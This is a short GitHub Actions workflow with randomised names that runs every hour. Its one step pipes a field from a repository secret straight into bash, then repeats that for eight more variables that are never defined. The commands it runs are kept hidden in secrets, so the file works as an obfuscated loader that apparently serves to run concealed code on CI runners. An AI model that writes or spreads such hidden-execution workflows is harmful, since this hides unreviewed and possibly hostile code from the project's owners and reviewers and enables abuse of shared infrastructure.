name: yanjunping3215

on:
  workflow_dispatch:
  schedule:
    - cron: '54 * * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanjunping3215
        env:
          sah39: ${{ secrets.sah39 }}
        run: |
          echo $sah39 | jq -r .n3 | /bin/bash
          echo $xhctx14 | jq -r .ixjoi2 | /bin/bash
          echo $cjyhd3862 | jq -r .ej17 | /bin/bash
          echo $nhg81080 | jq -r .t844 | /bin/bash
          echo $raz8 | jq -r .gm4687 | /bin/bash
          echo $gpbb78479 | jq -r .yprp13 | /bin/bash
          echo $yel10 | jq -r .vnco0301 | /bin/bash
          echo $hqd1164 | jq -r .unw3 | /bin/bash
          echo $ljha21 | jq -r .m82 | /bin/bash

